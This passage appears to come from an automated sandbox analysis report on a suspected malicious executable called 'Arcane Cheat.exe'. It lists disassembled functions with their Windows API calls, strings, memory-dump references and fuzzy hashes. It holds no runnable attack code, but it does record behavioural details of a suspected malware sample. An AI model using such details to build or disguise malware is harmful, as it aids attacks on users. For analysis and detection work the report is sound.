                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: e3e7ea388c2d2f1442e3a84b84ca6d98ab29a0cc880cbe0feb3c5263d2adac2e
                                  • Instruction ID: 1db16e3afb429896761666219dc27f76fec94408bbeae92949baa44ef2037abc
                                  • Opcode Fuzzy Hash: e3e7ea388c2d2f1442e3a84b84ca6d98ab29a0cc880cbe0feb3c5263d2adac2e
                                  • Instruction Fuzzy Hash: 7CF03C30A18B1CBBDB159BA4DC09A9DBBB9FB04756F414068F805E2290EF388A44CA94
                                  Function 0082EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00830085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008300A0
                                    • Part of subcall function 00830085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0082EB86,Crypt32.dll,00000000,0082EC0A,?,?,0082EBEC,?,?,?), ref: 008300C2
                                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0082EB92
                                  • GetProcAddress.KERNEL32(008681C0,CryptUnprotectMemory), ref: 0082EBA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                  • API String ID: 2141747552-1753850145
                                  • Opcode ID: eabc406eed84b51ab1a1af4107ab2d591e75401f35bd090a03ff7866a5a86680
                                  • Instruction ID: d629a6c8a67f54271ff13a395345d187038e95e1d1444c4a025a9da34af45e44
                                  • Opcode Fuzzy Hash: eabc406eed84b51ab1a1af4107ab2d591e75401f35bd090a03ff7866a5a86680
                                  • Instruction Fuzzy Hash: 8EE04FB1404B51AECB319F78E818B42FEE4FB15762F00881DE8E6E3380D6B8D5848B50
                                  Function 00847DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: 8fbe221b4626ded01222f4ac3fb361f96d6627264eb91025c16571d7fc304bef
                                  • Instruction ID: 04d56680271eda3fd564bc6c3dbdefcfd38f98697fdaaa97dc4829374b045fd4
                                  • Opcode Fuzzy Hash: 8fbe221b4626ded01222f4ac3fb361f96d6627264eb91025c16571d7fc304bef
                                  • Instruction Fuzzy Hash: 1641CF32A003089FDB24DF78C881A5EB7E5FF89714F5546A9E515EB281DB31EE01CB81
                                  Function 0084B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32 ref: 0084B619
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0084B63C
                                    • Part of subcall function 00848518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0084C13D,00000000,?,008467E2,?,00000008,?,008489AD,?,?,?), ref: 0084854A
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0084B662
                                  • _free.LIBCMT ref: 0084B675
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0084B684
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                  • String ID:
                                  • API String ID: 336800556-0
                                  • Opcode ID: d5bb1a9ecfb129f69e66d532cae1404a959c909790add94347daf44a1f6911c4
                                  • Instruction ID: 46778457d47642a60678fdd5a51ee50b2c0d8863589f8b01fec3b841848907d3
                                  • Opcode Fuzzy Hash: d5bb1a9ecfb129f69e66d532cae1404a959c909790add94347daf44a1f6911c4
                                  • Instruction Fuzzy Hash: 270184B2601719BF6722167A6C8CC7F7A6DFED6BE13160229BD04D3110DF64CD0195B1
                                  Function 00849029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,0084895F,008485FB,?,00848FD3,00000001,00000364,?,00843713,00000050,?,00860EE8,00000200), ref: 0084902E
                                  • _free.LIBCMT ref: 00849063
                                  • _free.LIBCMT ref: 0084908A
                                  • SetLastError.KERNEL32(00000000,?,00860EE8,00000200), ref: 00849097
                                  • SetLastError.KERNEL32(00000000,?,00860EE8,00000200), ref: 008490A0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ErrorLast$_free
                                  • String ID:
                                  • API String ID: 3170660625-0
                                  • Opcode ID: 91d60e0d3d6b84d50a8e35a2e8713e4e3e580b28d7253c3bf55fa54023c3c0a0
                                  • Instruction ID: 85bdf8ecfdd5450648da9235156204965f52fcd215114114cc03e25fd6757fca
                                  • Opcode Fuzzy Hash: 91d60e0d3d6b84d50a8e35a2e8713e4e3e580b28d7253c3bf55fa54023c3c0a0
                                  • Instruction Fuzzy Hash: 2D012876545F0CAB833267786C89D2F265DFBE03B63250024F555D2292EF68CD024566
                                  Function 0083075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00830A41: ResetEvent.KERNEL32(?), ref: 00830A53
                                    • Part of subcall function 00830A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00830A67
                                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0083078F
                                  • CloseHandle.KERNEL32(?,?), ref: 008307A9
                                  • DeleteCriticalSection.KERNEL32(?), ref: 008307C2
                                  • CloseHandle.KERNEL32(?), ref: 008307CE
                                  • CloseHandle.KERNEL32(?), ref: 008307DA
                                    • Part of subcall function 0083084E: WaitForSingleObject.KERNEL32(?,000000FF,00830A78,?), ref: 00830854
                                    • Part of subcall function 0083084E: GetLastError.KERNEL32(?), ref: 00830860
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                  • String ID:
                                  • API String ID: 1868215902-0
                                  • Opcode ID: e83e20908970afa62a11f21267e44e714e6ee935236583c86d78d99b460eefa1
                                  • Instruction ID: 71d3d81701188dcd82a889ca925259792be713860e4256e8528e6d9a2fd99852
                                  • Opcode Fuzzy Hash: e83e20908970afa62a11f21267e44e714e6ee935236583c86d78d99b460eefa1
                                  • Instruction Fuzzy Hash: 4501B571440B04EFC7229B69DC84FC6BBE9FB48751F000529F15A821A0CB7A6A44CF90
                                  Function 0084BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 0084BF28
                                    • Part of subcall function 008484DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?), ref: 008484F4
                                    • Part of subcall function 008484DE: GetLastError.KERNEL32(?,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?,?), ref: 00848506
                                  • _free.LIBCMT ref: 0084BF3A
                                  • _free.LIBCMT ref: 0084BF4C
                                  • _free.LIBCMT ref: 0084BF5E
                                  • _free.LIBCMT ref: 0084BF70
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: e473fc57ff4dbf7a7901e6b59eb79142ebe42367978c79c27fe71f5a2dcb9ab5
                                  • Instruction ID: 204117a0524b935bbf5f8e1aa822ccc12d7b59e6ec111230b108f569a5f846ac
                                  • Opcode Fuzzy Hash: e473fc57ff4dbf7a7901e6b59eb79142ebe42367978c79c27fe71f5a2dcb9ab5
                                  • Instruction Fuzzy Hash: FBF01D3290970DEB8624EB6CEE86C5AB3E9FA007117644849F40CD7911CF34FD858E69
                                  Function 00848060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 0084807E
                                    • Part of subcall function 008484DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?), ref: 008484F4
                                    • Part of subcall function 008484DE: GetLastError.KERNEL32(?,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?,?), ref: 00848506
                                  • _free.LIBCMT ref: 00848090
                                  • _free.LIBCMT ref: 008480A3
                                  • _free.LIBCMT ref: 008480B4
                                  • _free.LIBCMT ref: 008480C5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 8e75aea8261f6ea4b3a6fbdf0aa679fd950ae65d3496d43c60b20a83238e56b0
                                  • Instruction ID: 6821cfe426761c6f4ade10cdadb7de48fb55bc1e3574228bfa9fcad4362dfc11
                                  • Opcode Fuzzy Hash: 8e75aea8261f6ea4b3a6fbdf0aa679fd950ae65d3496d43c60b20a83238e56b0
                                  • Instruction Fuzzy Hash: 21F03A78805629CB8F65AF1DBC094893BA9FB24721308464AF401D7A71DF360A939FC6
                                  Function 008476BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe,00000104), ref: 008476FD
                                  • _free.LIBCMT ref: 008477C8
                                  • _free.LIBCMT ref: 008477D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: _free$FileModuleName
                                  • String ID: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe
                                  • API String ID: 2506810119-2723819080
                                  • Opcode ID: 0d0f3f6f7de261ff67e02a779f21080fcc1f8194807c2b6b910a9818d2235b67
                                  • Instruction ID: ee4460b544db2c15ff771d6819dbac534e2ded12b9d162b08b0cd93ff14de469
                                  • Opcode Fuzzy Hash: 0d0f3f6f7de261ff67e02a779f21080fcc1f8194807c2b6b910a9818d2235b67
                                  • Instruction Fuzzy Hash: 9D318D71A0821CEFDB21DF9DDC859AEBBECFB95750B6440A6E904D7201EB708E41CB91
                                  Function 00827574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                                  Download Yara Rule
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00827579
                                    • Part of subcall function 00823B3D: __EH_prolog.LIBCMT ref: 00823B42
                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00827640
                                    • Part of subcall function 00827BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00827C04
                                    • Part of subcall function 00827BF5: GetLastError.KERNEL32 ref: 00827C4A
                                    • Part of subcall function 00827BF5: CloseHandle.KERNEL32(?), ref: 00827C59
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                  • API String ID: 3813983858-639343689
                                  • Opcode ID: c1a3eed68cad7b68107c9e11af98f4a05ea4a163979c3409d9bc362bfe18c313
                                  • Instruction ID: 0d932661171a0003b7385a256efe50ce1f4449035e4b61e44fc33ac00960be28
                                  • Opcode Fuzzy Hash: c1a3eed68cad7b68107c9e11af98f4a05ea4a163979c3409d9bc362bfe18c313
                                  • Instruction Fuzzy Hash: 0131D571904268AEDF20EBA9ED05BEEBBA9FF64354F004055F444E7192DBB44984CBA2
                                  Function 0083A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0082130B: GetDlgItem.USER32(00000000,00003021), ref: 0082134F
                                    • Part of subcall function 0082130B: SetWindowTextW.USER32(00000000,008535B4), ref: 00821365
                                  • EndDialog.USER32(?,00000001), ref: 0083A4B8
                                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0083A4CD
                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0083A4E2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ItemText$DialogWindow
                                  • String ID: ASKNEXTVOL
                                  • API String ID: 445417207-3402441367
                                  • Opcode ID: 9ebae8fe18e15b96bc79812c801b7f892e1e7dcc1650d6eba11417e9ff4d79f4
                                  • Instruction ID: a93c55b862ab6b31a60e6b53e3816fddb19f0d7156372eff8403bafc7cea9f34
                                  • Opcode Fuzzy Hash: 9ebae8fe18e15b96bc79812c801b7f892e1e7dcc1650d6eba11417e9ff4d79f4
                                  • Instruction Fuzzy Hash: C811B632244210BFD6259F6CED4DF6637AAFB8A704F100114F281EB1A1C7A29945DBAB
                                  Function 0082D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: __fprintf_l_strncpy
                                  • String ID: $%s$@%s
                                  • API String ID: 1857242416-834177443
                                  • Opcode ID: 14926894de3ebdeaac2951ce089d0cfd050b36635a0231a6cae1c44f79f6099c
                                  • Instruction ID: 487ec9916a22506853379f6b7b0273eb61d5782aef294071d87de4cde3a448cd
                                  • Opcode Fuzzy Hash: 14926894de3ebdeaac2951ce089d0cfd050b36635a0231a6cae1c44f79f6099c
                                  • Instruction Fuzzy Hash: D7213A72440358AADB209EA4E806FEA7BA8FB05301F044522FE14D6192D771EA999B91
                                  Function 0083A990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0082130B: GetDlgItem.USER32(00000000,00003021), ref: 0082134F
                                    • Part of subcall function 0082130B: SetWindowTextW.USER32(00000000,008535B4), ref: 00821365
                                  • EndDialog.USER32(?,00000001), ref: 0083A9DE
                                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0083A9F6
                                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 0083AA24
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ItemText$DialogWindow
                                  • String ID: GETPASSWORD1
                                  • API String ID: 445417207-3292211884
                                  • Opcode ID: 6f4a157a246fbab8f4d5dc0e695a7635e2d5b5e8fecb5a276da1e12dcf48e9e8
                                  • Instruction ID: 0c5e41cbb88126aef5038a68e22f8908a6d54b6ad1f6a337d7cf2edcf4f19586
                                  • Opcode Fuzzy Hash: 6f4a157a246fbab8f4d5dc0e695a7635e2d5b5e8fecb5a276da1e12dcf48e9e8
                                  • Instruction Fuzzy Hash: D7114833940128BADB259AA89D09FFA3B7CFB89700F000011FE85F2081C2A09994D7A2
                                  Function 0082B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • _swprintf.LIBCMT ref: 0082B51E
                                    • Part of subcall function 0082400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0082401D
                                  • _wcschr.LIBVCRUNTIME ref: 0082B53C
                                  • _wcschr.LIBVCRUNTIME ref: 0082B54C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: _wcschr$__vswprintf_c_l_swprintf
                                  • String ID: %c:\
                                  • API String ID: 525462905-3142399695
                                  • Opcode ID: c40e8d505bd5579ae36b191bc7fd1bc1e9986b8416ccc0ae022e1c2c5d7a496b
                                  • Instruction ID: e6ace87955a906ebba76e7ba6b82ef48fff248c8fdc0be9a5c3b5e657d90761a
                                  • Opcode Fuzzy Hash: c40e8d505bd5579ae36b191bc7fd1bc1e9986b8416ccc0ae022e1c2c5d7a496b
                                  • Instruction Fuzzy Hash: E501F953905321BACB206BB9AC86C6BB7ACFE953A07504416F945CE082FB24D9C0C2A2
                                  Function 008306BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                  Download Yara Rule
                                  APIs
                                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0082ABC5,00000008,?,00000000,?,0082CB88,?,00000000), ref: 008306F3
                                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0082ABC5,00000008,?,00000000,?,0082CB88,?,00000000), ref: 008306FD
                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0082ABC5,00000008,?,00000000,?,0082CB88,?,00000000), ref: 0083070D
                                  Strings
                                  • Thread pool initialization failed., xrefs: 00830725
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
